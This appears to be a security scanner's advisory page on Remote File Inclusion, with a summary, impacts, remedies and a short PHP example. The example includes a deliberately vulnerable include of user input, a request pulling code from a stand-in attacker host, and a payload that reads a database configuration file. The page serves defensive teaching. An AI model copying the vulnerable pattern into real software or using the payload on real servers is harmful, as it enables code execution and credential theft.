Severity: High Test name: Remote File Inclusion (RFI) Test ID: rfi
Summary
Remote File Inclusion (RFI) targets web applications that dynamically incorporate external files or scripts. This vulnerability arises when these applications accept user-provided inputs (such as URLs or parameter values) and use them in file inclusion commands. Consequently, attackers can deceive the application into fetching and executing remote files containing malicious code. This allows the harmful code to run on the server under the privileges of the web server user, potentially compromising the server's integrity and security.
Impact
This vulnerability allows an attacker to:
Execute an unauthorized code on the server-side application
Execute an unauthorized code on the client-side application
Gain sensitive information
Crash the server
Basic example of Remote File Inclusion (PHP)
Server-side code:
<?php
$file = 'form.php';
if (isset($_REQUEST['file'])) {
$file = $_REQUEST['file'];
}
include $file;
```
2. Request:
```
https://your_web_site/preview.php?file=http://dangerous_web_site.com/malicious_code.php
```
3. Content of <i>"malicious_code.php"</i>
```js
<?php var_dump(include('../config/db.php'));
As a result, the attacker can steal the configuration of the database.
Location
The issue can be found in the source code on the server side.
The issue can be found in the source code on the client side.
Remedy suggestions
The most effective solution is to avoid passing user-submitted input to any file system/framework API.
If you have a limited number of allowed files to include, all of them can be stored as corresponding records in long-term storage (for example, a database) with specific identifiers. Such identifiers can be used as the request parameters to identify and include only allowed files.
If it is impossible to list the allowed files and user input cannot be avoided, ensure that the supplied values are valid. Sanitize the input by creating a list of trusted files. Use the “whitelist” approach.
